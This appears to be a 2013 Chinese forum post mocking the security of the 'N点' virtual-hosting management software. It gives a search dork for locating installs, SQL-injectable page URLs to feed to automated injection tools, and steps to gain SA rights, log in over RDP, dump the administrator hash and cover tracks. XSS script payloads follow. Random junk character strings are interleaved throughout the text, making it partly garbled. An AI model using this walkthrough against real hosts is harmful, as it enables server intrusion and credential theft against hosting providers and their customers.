不得不说N点实在是一个破东西
: \% S% }) A4 n就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
4 k* N. H, S& ^* l0 \4 x7 U+ M" m好吧 抱怨一下就行了 接下来关键的时候到了3 g- a9 ~/ ^; I
首先百度搜索关键字:inurl: (mmdatabase.asp)
7 u- e. d3 g6 \# C& p我随便列举一个: www.xxxx.com
( V+ a4 G4 M, U4 c3 @) M: ?修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=18 ?" s) S8 Z' `2 \
扔入NBSI 或者啊D等各种傻逼工具后
7 {% v/ J. q3 L7 U% }1 [" y你们会看到是SA权限
5 |6 L1 U4 d) \9 Y$ S6 j果断3389 上去 hash得到administrator密码
3 x9 x/ a/ O: w0 d9 K9 W, B4 z擦屁股走人~. |1 ]3 l- ^( O! i4 w- O# V+ p
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
) X+ E2 _6 I9 x1 B$ q- R
1 M; o( x! q8 Z- h再附上其他几个漏洞页面& c- k; f2 p' ~# K \
SQL:
# N# W8 H- i4 [' Y2 y9 Mhttp://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
8 l) y# K7 K( Qhttp://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
& N- D& B9 X/ _' H# Ohttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9# X. p$ ^( F6 c- l
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2, O% z# s' l( ]+ D8 P
XSS证明:- \. P$ d! F9 w" g- [. l3 `
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”5 @& _3 `8 S- @, ]
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
: \1 j1 |- z, H1 u. ahttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>. J( z7 [) e) {# D) i. f
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜- ]' K- l1 e6 y# W4 k" q
还是星外吧 你们懂的 g4 n O& a2 X' ~" i1 j
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
5 d6 W3 s$ b8 h9 OPS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉5 g# x3 Q$ c; [9 Z
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对